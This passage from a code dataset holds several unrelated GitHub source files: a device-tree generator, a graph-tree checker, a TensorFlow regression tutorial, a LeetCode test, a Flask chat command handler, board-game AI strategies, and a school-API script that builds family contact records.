\\\"ikwzm,u-dma-buf\\\";\\n\"\n dts += f\" device-name = \\\"delilah_data{i}\\\";\\n\"\n dts += f\" size = <0x0 {hex(data_size)}>;\\n\"\n dts += f\" memory-region = <&delilah_d{i}>;\\n\"\n dts += \" sync-mode = <1>;\\n\"\n dts += \" dma-mask = <64>;\\n\"\n dts += \" };\\n\\n\"\n\ndts += f\" udma_s0 {{\\n\"\ndts += \" compatible = \\\"ikwzm,u-dma-buf\\\";\\n\"\ndts += f\" device-name = \\\"delilah_shared0\\\";\\n\"\ndts += f\" size = <0x0 {hex(shared_size)}>;\\n\"\ndts += f\" memory-region = <&delilah_s0>;\\n\"\ndts += \" sync-mode = <1>;\\n\"\ndts += \" dma-mask = <64>;\\n\"\ndts += \" };\\n\\n\"\n\ndts += \"};\\n\"\n\nprint(dts)\n\n","repo_name":"delilah-csp/delilah-pt","sub_path":"project-spec/meta-user/recipes-bsp/device-tree/files/gen_dts.py","file_name":"gen_dts.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30197163869","text":"array=[]\ndeg1=[]\ndic1=dict()\nloop=1\ncase=1\nkey=-2\ndef creatdic(array):\n global dic1\n for i in range(len(deg1)):\n if array[i] in dic1:\n dic1[array[i]] += 1\n else:\n dic1[array[i]] = 1\ndef findkey(dic,val):\n for i in dic:\n if dic[i] == val:\n return i\n return -1\nlargeloop=1\nwhile largeloop==1:\n print(loop)\n while loop==1:\n print(\"in\")\n user=input().split(\" \")\n if user[0]=='-1'and user[1]=='-1':\n loop=0\n largeloop=0\n break\n for i in range(len(user)):\n if i%2==0:\n if user[i]=='0'and user[i+1]=='0':\n loop=0\n break\n deg1.append(user[i])\n print(deg1)\n while len(deg1)>1:\n print(deg1)\n creatdic(deg1)\n key=findkey(dic1,1)\n if key==-1:\n break\n dic1.clear()\n for i in range(len(deg1)):\n if deg1[i]==str(key):\n if i%2==0:\n del deg1[i]\n del deg1[i]\n else:\n del deg1[i]\n del deg1[i-1]\n break\n if key==-1 and user[0]!='-1'and user[1]!=-1:\n print(\"case\", case ,\" is not a tree\")\n if int(key)>-1 and user[0]!='-1'and user[1]!=-1:\n print(\"case\", case ,\" is a tree\")\n key=-2\n case+=1\n user.clear()\n deg1.clear()\n loop=1\n\n","repo_name":"s3819668/cpePractice_python","sub_path":"cpe20201020/uva615.py","file_name":"uva615.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"679325812","text":"import tensorflow as tf \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nhello = tf.constant(\"hello \")\nworld = tf.constant(\"world\")\n\nwith tf.Session() as sess :\n result = sess.run(hello+world)\n\na = tf.constant(10)\nb = tf.constant(20)\n\nwith tf.Session() as sess:\n result = sess.run(a+b) \n\n#numpy ways in tensorflow\nconstant = tf.constant(10)\nfill_mat = tf.fill((4,4),10)\nmyzeros = tf.zeros((4,4))\nmyones = tf.ones((4,4))\n\n#random numbers normal distribution\nmyrandn = tf.random_normal((4,4),mean=0.0,stddev=1.0)\n\n#random numbers uniform distribution\nmyrandu = tf.random_uniform((4,4),minval=0, maxval=1)\n\nop = [constant,fill_mat,myzeros,myones,myrandn,myrandu]\n#interactive session\nsess = tf.InteractiveSession()\n\n# for i in op:\n# print(sess.run(i))\n# print('\\n')\n\n#matrix mul\na = np.arange(1,5).reshape((2,2))\nb = np.array([10,100]).reshape((2,1))\nmatA = tf.constant(a)\nmatB = tf.constant(b)\n#print(sess.run(tf.matmul(matA,matB)))\n#print(tf.matmul(matA,matB).eval())\n\n#graph\nn1 = tf.constant(1)\nn2 = tf.constant(2)\nn3 = n1+n2\n\n#print(tf.get_default_graph())\ng = tf.Graph()\ngraph_one = 
tf.get_default_graph()\ngraph_two = tf.Graph()\n\n#set graph_two as default graph\nwith graph_two.as_default() :\n #print(graph_two is tf.get_default_graph()) #print true\n pass\n\n\n#variables and placeholder\n#2 main types of tensor object in graph (variable and placeholder)\n#variables can hold the values of weight and biases throughout the session (should be initilized)\n#placehoder used to feed tha actual traning (initial empty)\n\nmy_tensor = tf.random_uniform((4,4),0,1)\nmy_var = tf.Variable(initial_value=my_tensor)\n#we need to initilized variable before run it\nsess.run(tf.global_variables_initializer())\n#print(sess.run(my_var))\n\n#placeholder\nph = tf.placeholder(tf.float32,shape=(None,5))\n\n############ building models ###############\nnp.random.seed(101) #np rand seed \"same result for everyone\"\ntf.set_random_seed(101) #tf rand seed\n\nrand_a = np.random.uniform(0,100,(5,5))\nrand_b = np.random.uniform(0,100,(5,1))\n\n#create placeholders\na = tf.placeholder(tf.float32)\nb = tf.placeholder(tf.float32)\n\n#create oparation\nadd_op = a+b\nmul_op = a*b\n\n#create session => they can use graph with feed dictionary\nwith tf.Session() as sess :\n add_result = sess.run(add_op, feed_dict={a:rand_a,b:rand_b})\n #print(add_result)\n mult_result = sess.run(mul_op,feed_dict={a:rand_a,b:rand_b})\n #print(mult_result)\n\n#create neurons nw\nn_features = 10\nn_dens_neurons = 3 #assumtion : 1 layer and 3 dense neurons\n\nx = tf.placeholder(tf.float32,shape=(None,n_features)) #rows are #of sample\n # cols are # of features\n\nw = tf.Variable(tf.random_normal([n_features,n_dens_neurons])) #weight\nb = tf.Variable(tf.ones([n_dens_neurons]))\n\n#build the perception model\nwx = tf.matmul(x,w)\nz = tf.add(wx,b)\n\n#acivated fn\na = tf.sigmoid(z)\n\n#init tha Variable\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess :\n sess.run(init)\n layer_out = sess.run(a,feed_dict={x:np.random.random([1,n_features])})\n #print(layer_out)\n\n############# simple Regreession ex ###########\nx_data = np.linspace(0,10,10)+np.random.uniform(-1.5,1.5,10)\ny_label = np.linspace(0,10,10)+np.random.uniform(-1.5,1.5,10)\n\n#plt.plot(x_data,y_label, '*')\n#plt.show()\n\n# y = mx+b\nm = tf.Variable(0.44) #initial random values\nb = tf.Variable(0.87)\n\n#cost fn\nerr = 0\nfor x,y in zip(x_data, y_label) :\n y_hat = m*x+b #here represent the predected value\n err += (y-y_hat)**2 #this is what we want to minize\n\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001) #To minize the err\ntrain = optimizer.minimize(err)\n\nwith tf.Session() as sess :\n sess.run(tf.global_variables_initializer())\n trainig_steps = 1 #ajust it \n for i in range(trainig_steps) :\n sess.run(train)\n final_slop, final_intercept = sess.run([m,b])\n\nx_test = np.linspace(-1,11,10)\n#y = mx+b\ny_pred_plot = final_slop*x_test + final_intercept #normalized data\n\n# plot\n#plt.plot(x_data,y_label, '*')\n#plt.plot(x_test,y_pred_plot, '*') \n#plt.show()\n\n###########################################################################\n############################ Regrssion analysis ###########################\n###########################################################################\nx_data = np.linspace(0.0,10, 1000000)\nnoise = np.random.randn(len(x_data))\n\n# create model\n#y = mx + b ; m=.5 b = 5\ny_true = (0.5*x_data) + 5 + noise #adding noice we can have complex patten\n # we do not use it when we have real data set to feed\n\n#create data frame\nx_df = pd.DataFrame(data=x_data, columns=['X data'])\ny_df = 
pd.DataFrame(data=y_true, columns=['Y'])\n#print(x_df.head())\n\n#concatenate 2 data frams\nmy_data = pd.concat([x_df,y_df],axis=1)\n#print(my_data.head())\n\n# note = \n# if we plot all data it cause to crash the kernal beacuse there are hugh data set\n# it is good practise to plot sample from it \n\n#my_data.sample(n=250).plot(kind='scatter', x='X data', y='Y')\n#plt.show()\n\n# need to train data in rensorflow model batch by batch\nbatch_size = 8\nm = tf.Variable(0.81)\nb = tf.Variable(0.17)\n\nxph = tf.placeholder(tf.float32,[batch_size])\nyph = tf.placeholder(tf.float32,[batch_size])\n\ny_model = m*xph + b\n\nerror = tf.reduce_sum(tf.square(yph-y_model))\n\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\ntrain = optimizer.minimize(error)\n\nwith tf.Session() as sess :\n sess.run(tf.global_variables_initializer())\n batches = 1000\n\n for i in range(batches) :\n rand_index = np.random.randint(len(x_data), size=batch_size,)\n feed = {xph:x_data[rand_index], yph:y_true[rand_index]}\n sess.run(train, feed_dict=feed)\n \n model_m, model_b = sess.run([m,b])\n\ny_hat = model_b*x_data + model_b # estimate y_hat\n\n#print('b = ',model_b)\n#print('m = ',model_m)\n\n######################################################################\n################ Regression Analysis using ##############################\n############## Estimator API ############################################\n#########################################################################\n\n# steps :\n# define the list of feature cols\n# define the Estimator model\n# create data input function\n# call train evaluate model and predect method on the estimate object\n\nfeat_cols = [tf.feature_column.numeric_column(key='X',shape=[1])] #all the feature in list\nEstimator = tf.estimator.LinearRegressor(feature_columns=feat_cols) #use estimator as linear regression\n\nx_train, x_eval, y_train, y_eval = train_test_split(x_data, y_true, test_size = 0.3,random_state=101) #use x_train 70% and x_eval 30% of data\n\ninput_func = tf.estimator.inputs.numpy_input_fn({'X':x_train},y_train, batch_size=8, num_epochs=None, shuffle=True)\ninput_input_func = tf.estimator.inputs.numpy_input_fn({'X':x_train},y_train, batch_size=8, num_epochs=1000, shuffle=False)\neval_input_func = tf.estimator.inputs.numpy_input_fn({'X':x_eval},y_eval, batch_size=8, num_epochs=1000, shuffle=False)\n\n#now trian the estimator(using matrix)\nEstimator.train(input_fn=input_func, steps=1000) #step just like num_epochs\ntrian_matrix =Estimator.evaluate(input_fn=input_input_func, steps=1000)#get matrix on the training data\neval_matrix = Estimator.evaluate(input_fn=eval_input_func, steps=1000) #basically give lost fn for me\n\nprint('My Training data matrix')\nprint(trian_matrix)\n\nprint('My Test data matrix')\nprint(eval_matrix)\n#note\n#your training data matrix is much better that evaluation matrix data\n#then you must be overfitting your train data\n# Overfitting refers to a model that models the training data too well.\n# Underfitting refers to a model that can neither model the training data nor generalize to new data.\n\n#predict data here\nbrand_new_data = np.linspace(0,10,10)\ninput_fn_predict = tf.estimator.inputs.numpy_input_fn({'X':brand_new_data}, shuffle=False)\nlist(Estimator.predict(input_fn_predict))\npredictions = []\nfor pred in Estimator.predict(input_fn_predict):\n predictions.append(pred['predictions'])\n\nprint(predictions)\n\nmy_data.sample(n=250).plot(kind='scatter', x='X data', 
y='Y')\nplt.plot(brand_new_data,predictions,'r*')\nplt.show()","repo_name":"Rasika666/ml","sub_path":"tensorflow/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21453356575","text":"import unittest\n\nfrom solution import Solution\n\nclass Test(unittest.TestCase):\n def setUp(self) -> None:\n self.s = Solution()\n return super().setUp()\n\n def test1(self):\n words = [\"i\",\"love\",\"leetcode\",\"i\",\"love\",\"coding\"]\n k = 2\n ans = [\"i\",\"love\"]\n self.assertEqual(self.s.topKFrequent(words, k), ans)\n\n def test2(self):\n words = [\"the\",\"day\",\"is\",\"sunny\",\"the\",\"the\",\"the\",\"sunny\",\"is\",\"is\"]\n k = 4\n ans = [\"the\",\"is\",\"sunny\",\"day\"]\n self.assertEqual(self.s.topKFrequent(words, k), ans) \n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"jerrt2003/leetcode-in-python","sub_path":"692_Top_K_Frequent_Words/solution_test.py","file_name":"solution_test.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72038278568","text":"# -*- coding: utf8 -*-\r\nfrom flask_socketio import send, emit\r\n\r\ndef chat(nick, text):\r\n msg = text\r\n result = \"\"\r\n j = 0 \r\n\r\n for i in range(0,len(msg)):\r\n if msg[i:i+4] == \"www.\":\r\n while True:\r\n result += msg[i+j]\r\n j += 1\r\n if msg[i+j] == \" \":\r\n break\r\n msg = msg[:i]+''+result+''+msg[i+j:]\r\n break\r\n\r\n if msg == \"\":\r\n return\r\n \t\t\r\n elif msg[:5] == \"/info\":\r\n text = \"Console ~ Chat server is running!\"\r\n emit('output', text, include_self=True, broadcast=False)\r\n\r\n elif msg[:5] == \"/help\":\r\n text = \"Console
~ Available commands: ~
/info (server information)
/help (this list)
E key (inventory)
SWAD keys (movement)
F key (usage)
T key (chat)
\"\r\n emit('output', text, include_self=True, broadcast=False)\r\n\r\n elif msg[:4] == \"/url\":\r\n if (msg[5:12]==\"http://\")or(msg[5:13]==\"https://\"):\r\n msg = ''+msg[4:]+''\r\n else:\r\n msg = ''+msg[4:]+''\r\n\r\n elif (msg[:7] == \"http://\")or(msg[:8] == \"https://\"):\r\n msg = ''+msg+''\r\n\r\n else:\r\n if(msg[0] == \"/\"):\r\n text = \"Console ~ Unknown command
Use command /help for help.
\"\r\n emit('output', text, include_self=True, broadcast=False)\r\n\r\n if (msg[0] != '/') and (msg != \" \"):\r\n text = \"\"+nick+\": \" +msg+\"\"\r\n emit('output', text, include_self=False, broadcast=True)\r\n text = \"\"+nick+\": \" +msg+\"\"\r\n emit('output', text, include_self=True, broadcast=False)","repo_name":"Athelios/OverDark","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25560569574","text":"import random\n\nfrom game import InputGame, ADVANCE, MUSTER, DEVELOP, DESPOIL\n\n# the four center-most spaces on a 6x6 grid\nCENTER = ((2, 2), (2, 3), (3, 2), (3, 3))\n\ndef random_action (game, action_options):\n possible = []\n for action, options in action_options.items():\n for option in options:\n possible.append([action, option])\n if len(possible) > 0:\n action, param = random.choice(possible)\n action_func = getattr(game, '%s_action' % action.lower())\n action_func(param)\n\ndef despoiler (game, player):\n # WORK TIL YOU CAN'T\n # BUY WHILE YOU CAN\n # GRIN FOR YOU MUST\n # DIE! DIE! DIE!\n action_options = game.player_options(player)\n # despoil if you can\n if DESPOIL in action_options:\n options = action_options[DESPOIL]\n choice = random.choice(options)\n game.despoil_action(choice)\n # muster if you can't\n elif MUSTER in action_options:\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n else:\n random_action(game, action_options)\n\ndef overseer (game, player):\n # OF COURSE OUR SUPERVISION IS NECESSARY\n # WHY, JUST THINK OF ALL THE TERRIBLE THINGS YOU MIGHT DO\n # IF LEFT TO YOUR OWN DEVICES\n action_options = game.player_options(player)\n other_units = game.other_player_units(player)\n flanked_coords = { unit.coord for unit in other_units if game.is_flanked(unit) }\n advance_options = action_options.get(ADVANCE, [])\n capture_options = [option for option in advance_options if option[1] in flanked_coords]\n center_occupied = all([game.unit(*coord) or not game.space(*coord).passable for coord in CENTER])\n # stomp a random thing that can be stomped\n if len(capture_options) > 0:\n choice = random.choice(capture_options)\n game.advance_action(choice)\n # raise infrastructure in order to muster battalions\n elif DEVELOP in action_options:\n options = action_options[DEVELOP]\n choice = random.choice(options)\n game.develop_action(choice)\n # raise more forces\n elif MUSTER in action_options:\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n # move toward the center to establish control\n elif ADVANCE in action_options and not center_occupied:\n units = game.player_units(player)\n distances = []\n for coord in CENTER:\n for option in advance_options:\n if option[0] in CENTER: continue\n x_distance = abs(coord[0] - option[1][0])\n y_distance = abs(coord[1] - option[1][1])\n distance = x_distance + y_distance\n distances.append([distance, option])\n min_distance = min([distance for distance, option in distances])\n options = [option for distance, option in distances if distance == min_distance]\n choice = random.choice(options)\n game.advance_action(choice)\n # move somewhere. 
anywhere!\n elif ADVANCE in action_options:\n options = action_options[ADVANCE]\n choice = random.choice(options)\n game.advance_action(choice)\n else:\n random_action(game, action_options)\n\ndef technocrat (game, player):\n # I'M SURE THAT WITH THE RIGHT PEOPLE IN PLACE\n # YOU KNOW, THE PEOPLE WHO KNOW ABOUT THIS SORT OF THING\n # THAT EVERYTHING WILL BE FINE.\n action_options = game.player_options(player)\n units = game.player_units(player)\n if len(units) == 0 and MUSTER in action_options:\n # no units. attempt to muster.\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n elif DEVELOP in action_options:\n # develop\n options = action_options[DEVELOP]\n choice = random.choice(options)\n game.develop_action(choice)\n elif ADVANCE in action_options:\n # advance\n options = action_options[ADVANCE]\n choice = random.choice(options)\n game.advance_action(choice)\n else:\n random_action(game, action_options)\n\ndef expansionist (game, player):\n # ONCE, WE SPANNED THE GLOBE\n # WHY NOT AGAIN?\n # WHY NOT FOREVER\n action_options = game.player_options(player)\n develop_options = action_options.get(DEVELOP, [])\n low_infra_spaces = [coord for coord in develop_options if game.space(*coord)._infra == 0]\n move_options = action_options.get(ADVANCE, [])\n no_infra_moves = [coords for coords in move_options if game.space(*coords[1])._infra == 0]\n units = game.player_units(player)\n # develop any spaces with 0 infra\n if len(low_infra_spaces) > 0:\n choice = random.choice(low_infra_spaces)\n game.develop_action(choice)\n # move to a space with 0 infra\n elif ADVANCE in action_options and len(no_infra_moves) > 0:\n choice = random.choice(no_infra_moves)\n game.advance_action(choice)\n # muster if you have no units\n elif MUSTER in action_options and len(units) == 0:\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n # develop further if there is nowhere left to go\n elif DEVELOP in action_options:\n options = action_options[DEVELOP]\n choice = random.choice(options)\n game.develop_action(choice)\n # fortify\n elif MUSTER in action_options and len(units) == 0:\n options = action_options[MUSTER]\n choice = random.choice(options)\n game.muster_action(choice)\n # move somewhere. 
anywhere!\n elif ADVANCE in action_options:\n options = action_options[ADVANCE]\n choice = random.choice(options)\n game.advance_action(choice)\n else:\n random_action(game, action_options)\n\ndef random_player (game, player):\n # IS FREE WILL A PHYSICAL FACT\n # OR A MATTER OF PERSPECTIVE?\n action_options = game.player_options(player)\n random_action(game, action_options)\n\nAI = [despoiler, overseer, technocrat, expansionist, random_player]\n\nclass SolitaireGame(InputGame):\n \"\"\"\n A single-player game in which the other three positions are occupied by AI.\n \"\"\"\n\n def __init__ (self):\n super(SolitaireGame, self).__init__(4)\n # keep who's who a secret\n self._ai = [random.choice(AI) for i in range(3)]\n\n def do_turn (self, player):\n if player == 0:\n super(SolitaireGame, self).do_turn(player)\n else:\n ai = self._ai[player-1]\n ai(self, player)\n\nif __name__ == '__main__':\n SolitaireGame.introduction()\n game = SolitaireGame()\n game.play()\n","repo_name":"garbados/ambition-game","sub_path":"solitaire.py","file_name":"solitaire.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74490756966","text":"import argparse\r\nimport re\r\nimport logging\r\nimport requests\r\nfrom ast import literal_eval\r\nimport sys\r\n\r\n## CONSTANTS\r\n\r\nMAIN_URL = 'https://app.sycamoreschool.com/api/v1';\r\n\r\nRELATIONSHIPS = {'Parents' : 1, 'Mother' : 2, 'Father' : 3,\r\n 'Grandmother' : 4, 'Grandfather' : 5,\r\n 'Stepmother' : 6, 'Stepfather' : 7,\r\n 'Aunt' : 8, 'Uncle' : 9, 'Relative' : 10};\r\n \r\nSTUDENT_DOMAIN = '@student.gssb.org'\r\n \r\n## \r\n\r\nclass RestError(Exception):\r\n def __init__(self, value):\r\n self.value = value\r\n def __str__(self):\r\n return repr(self.value);\r\n \r\ndef correctUnicodeEscape(text):\r\n # find all occurrences of the pattern\r\n newText = '';\r\n startIndex = 0;\r\n # find all occurrences of the pattern \\uhhhh in text\r\n for m in re.finditer(r'\\\\u[0-9a-f]{4}', text): \r\n # attach text between patterns to result string\r\n newText += text[startIndex:m.start()]\r\n startIndex = m.end()\r\n # convert \\uhhhh with 4 digit hex number to unicode\r\n hexnum = '0x' + text[m.start()+2:m.end()]\r\n uChar = ''\r\n # only convert and add unicode \r\n if int(hexnum, 0) <= 255:\r\n uChar = chr(int(hexnum, 0))\r\n logging.debug(\"Converted hex \" + hexnum +\r\n \" to special character '\" + uChar + \"'\")\r\n # attach converted unicode character to return string\r\n newText += uChar\r\n \r\n # attach remaining text after last occurrence of pattern\r\n newText += text[startIndex:len(text)]\r\n\r\n return newText;\r\n \r\ndef retrieve(url, token):\r\n\r\n response = requests.get(url, headers={'Authorization': 'Bearer ' + token,\r\n 'Content-type': 'application/json; charset=utf-8'});\r\n if response.status_code == 204:\r\n logging.debug(\"No content found for \" + url)\r\n elif not response.status_code == 200:\r\n msg = 'Request ' + url + ' failed with code ' + str(response.status_code);\r\n raise RestError(msg)\r\n info = correctUnicodeEscape(response.text).replace('\\\\','')\r\n logging.debug((info))\r\n record = [];\r\n try:\r\n if len(info) > 0:\r\n logging.debug(info)\r\n replacedNull = info.replace(':null', ':\"\"')\r\n record = literal_eval(replacedNull)\r\n except ValueError as e:\r\n print(info)\r\n msg = \"Failed type conversion of result \" + info + \" Exception: \" + e.message;\r\n logging.error(msg);\r\n return record;\r\n\r\ndef 
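All four solitaire.py strategies above share one skeleton: try the preferred actions in order, then fall back to a random legal move (note that the expansionist's second "fortify" branch repeats the earlier `MUSTER ... len(units) == 0` condition and can never fire). A game-agnostic sketch of that pattern, with illustrative names that are not from the source:

```python
# Game-agnostic sketch of the preference-ordered strategy skeleton used by
# despoiler/overseer/technocrat/expansionist above; names are illustrative.
import random

def choose(action_options, preferences):
    """action_options maps action name -> list of legal options."""
    for action in preferences:
        options = action_options.get(action)
        if options:
            return action, random.choice(options)
    # fall back to any legal (action, option) pair, like random_action above
    legal = [(a, o) for a, opts in action_options.items() for o in opts]
    return random.choice(legal) if legal else None

# A despoiler-like ordering: despoil first, muster second, anything third.
assert choose({'MUSTER': [(0, 0)], 'DESPOIL': []}, ['DESPOIL', 'MUSTER']) == ('MUSTER', (0, 0))
```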
incrChar(char):\r\n n = chr(ord(char) + 1)\r\n \r\n if (ord(char) == ord('z')):\r\n n = ord('a')\r\n elif (ord(char) == ord('Z')):\r\n n = ord('A')\r\n elif (ord(char) == ord('9')):\r\n n = ord('0')\r\n elif (ord(char) == ord('-')):\r\n n = ord('~')\r\n else:\r\n n = ord(char) + 1\r\n \r\n return chr(n)\r\n\r\ndef incrString(string):\r\n return \"\".join(incrChar(a) for a in string)\r\n\r\ndef camelCase(string):\r\n return \" \".join(a.capitalize() for a in re.split(r\"[^a-zA-Z0-9&#\\.-]\", string))\r\n\r\ndef getSortedContacts(familyId, token):\r\n familyContactsURL = MAIN_URL + '/Family/' + str(familyId) + '/Contacts'\r\n familyContactsDict = retrieve(familyContactsURL, token)\r\n\r\n # Sort family based on RELATIONSHIPS\r\n familyContactsDict = sorted(familyContactsDict, \r\n key=lambda family: sortCriteria(family));\r\n return familyContactsDict\r\n\r\ndef __formatFirstName(name: str) -> str:\r\n return (\r\n name\r\n .strip()\r\n .replace(' ', '')\r\n .replace('\\'', '')\r\n )\r\n\r\ndef __formatLastName(name: str) -> str:\r\n name = (\r\n name\r\n .strip()\r\n .replace('\\'', '')\r\n )\r\n\r\n if name[:4] in ('van ', 'Van ', 'von ', 'Von '):\r\n return name.replace(' ', '')\r\n elif name.startswith('Freiin von '):\r\n return name.replace('Freiin von ', 'Von').replace(' ','-')\r\n elif ' zu ' in name:\r\n return name.replace(' ', '')\r\n elif ' Zu ' in name:\r\n return name.replace(' ', '')\r\n elif name.startswith('de '):\r\n return name.replace(' ', '')\r\n elif name.startswith('De '):\r\n return name.replace(' ', '')\r\n elif ' Nguyen' in name:\r\n return name.replace(' ', '')\r\n elif ' nguyen' in name:\r\n return name.replace(' ', '')\r\n else:\r\n return name.replace(' ', '-')\r\n\r\ndef __createEmailAddress(first_name: str, last_name: str, domain: str) -> str:\r\n return (__formatFirstName(first_name) + '.'\r\n + __formatLastName(last_name)\r\n + domain)\r\n\r\ndef createStudentEmailAddress(first_name: str, last_name: str) -> str:\r\n return __createEmailAddress(first_name, last_name, STUDENT_DOMAIN)\r\n\r\ndef getFamilyEmails(familyContacts):\r\n # pick up to three first family contacts that define an email\r\n firstThree = list(filter(lambda r: includeEmail(r), familyContacts))[:3];\r\n result = [None, \"\", \"\"];\r\n for i in range(0, len(firstThree)):\r\n result[i] = firstThree[i][\"Email\"].strip();\r\n\r\n if (not result[0]):\r\n logging.warning(\"No Email defined for {0} {1}\".format(familyContacts[0][\"LastName\"],\r\n familyContacts[0][\"FirstName\"]))\r\n return result\r\n\r\ndef getParents(familyContacts : list, familyId):\r\n parents = list(filter(lambda r: r[\"PrimaryParent\"] == 1, familyContacts))\r\n result = [None, None];\r\n if len(parents) > 2:\r\n logging.info(\"more than two primaries for family {}\".format(familyId))\r\n result[0:len(parents[:2])] = parents[:2]\r\n assert result[0], \"At least one parent must exist\"\r\n return result\r\n\r\ndef getFamilyDict(MAIN_URL, schoolId, token):\r\n listFamiliesUrl = MAIN_URL + '/School/' + str(schoolId) + '/Families'\r\n listFamilies = retrieve(listFamiliesUrl, token)\r\n logging.info('Found {0} family records.'.format(str(len(listFamilies))))\r\n \r\n familyDict = {}\r\n for family in listFamilies:\r\n familyContacts = getSortedContacts(family[\"ID\"], token)\r\n familyEmails = getFamilyEmails(familyContacts)\r\n [parent1, parent2] = getParents(familyContacts, family[\"Code\"][:7])\r\n family['primaryEmail'] = familyEmails[0]\r\n family['secondaryEmail'] = familyEmails[1]\r\n family['tertiaryEmail'] = 
familyEmails[2]\r\n \r\n family['parent1FirstName'] = parent1[\"FirstName\"].strip()\r\n family['parent1LastName'] = parent1[\"LastName\"].strip()\r\n family['parent2FirstName'] = parent2[\"FirstName\"].strip() if parent2 else ''\r\n family['parent2LastName'] = parent2[\"LastName\"].strip() if parent2 else ''\r\n\r\n familyDict[family[\"Code\"]] = family\r\n logging.debug(family)\r\n return familyDict\r\n\r\ndef getClassDict(MAIN_URL, schoolId, token):\r\n listClassesUrl = MAIN_URL + '/School/' + str(schoolId) + '/Classes'\r\n classesDict = retrieve(listClassesUrl, token)\r\n logging.info('Retrieving {0} class records.'\r\n .format(str(len(classesDict[\"Period\"]))))\r\n logging.debug(classesDict)\r\n # validate class data\r\n validateClassDetails(classesDict[\"Period\"])\r\n return classesDict\r\n \r\ndef formatStateName(state):\r\n newState = state.strip();\r\n if (\"massachusetts\" in state.strip().lower()):\r\n newState = \"MA\";\r\n elif (\"new hampshire\" in state.strip().lower()):\r\n newState = \"NH\";\r\n elif (\"rhode island\" in state.strip().lower()):\r\n newState = \"RI\";\r\n return newState.upper();\r\n\r\ndef formatClassName(className, teacherLast, teacherFirst):\r\n return className;\r\n\r\ndef sortCriteria(familyMemberRecord):\r\n code = RELATIONSHIPS.get(familyMemberRecord[\"Relation\"], 100);\r\n if (familyMemberRecord[\"PrimaryParent\"] == 1):\r\n code = 1;\r\n return code;\r\n\r\ndef containsEmail(familyMemberRecord):\r\n email = familyMemberRecord[\"Email\"].strip();\r\n return email and \"@\" in email;\r\n\r\ndef includeEmail(familyMemberRecord):\r\n return (sortCriteria(familyMemberRecord) < 100 and\r\n containsEmail(familyMemberRecord));\r\n \r\ndef createRecordHeader() :\r\n header = [\"StudentLastName\",\r\n \"StudentFirstName\",\r\n \"StudentName\",\r\n \"Class\",\r\n \"Room\",\r\n \"TeacherLastName\",\r\n \"TeacherFirstName\",\r\n \"TeacherName\",\r\n \"StudentGSSBEmail,\"\r\n \"FamilyID\",\r\n \"StudentCode\",\r\n \"LingcoPwd\",\r\n \"Nikolaus\",\r\n \"Parent1LastName\",\r\n \"Parent1FirstName\",\r\n \"Parent2LastName\",\r\n \"Parent2FirstName\",\r\n \"ParentNames\",\r\n \"StudentLastNameIfDifferent1\",\r\n \"StudentLastNameIfDifferent2\",\r\n \"PrimaryParentEmail\",\r\n \"SecondaryParentEmail\",\r\n \"TertiaryParentEmail\",\r\n \"StreetAddress\", \r\n \"CityStateZip\"]\r\n \r\n return \",\".join(header);\r\n\r\ndef getAddress(family):\r\n address = ''\r\n addresses = [camelCase(family[\"Address\"].strip()), \r\n camelCase(family[\"Address2\"].strip())]\r\n if (addresses[0] == addresses[1]):\r\n address = '\"' + addresses[0] + '\"'\r\n else:\r\n neAddresses = filter(lambda a:a.strip(), addresses)\r\n address = '\"' + ', '.join(neAddresses) + '\"'\r\n return address\r\n \r\ndef createRecord(aClassRecord, classDetailDict, classStudent, nikolaus, familyDict):\r\n try:\r\n # family code is 7 characters long\r\n familyCode = classStudent[\"Code\"][:7]\r\n studentCode = classStudent[\"Code\"].strip()\r\n family = familyDict.get(familyCode);\r\n if (not family):\r\n logging.error(\"unable to include student with Code \" + familyCode);\r\n record = [];\r\n return \"\"\r\n \r\n family[\"State\"] = formatStateName(family[\"State\"]);\r\n \r\n teacherFullName = aClassRecord[\"PrimaryTeacher\"]\r\n teacherFirstName = \"\"\r\n teacherLastName = \"\"\r\n if (teacherFullName.strip()):\r\n teacherNameTokens = teacherFullName.split()\r\n teacherFirstName = teacherNameTokens[0]\r\n teacherLastName = \" \".join(teacherNameTokens[1:])\r\n \r\n studentLastNameIfDifferent1 = 
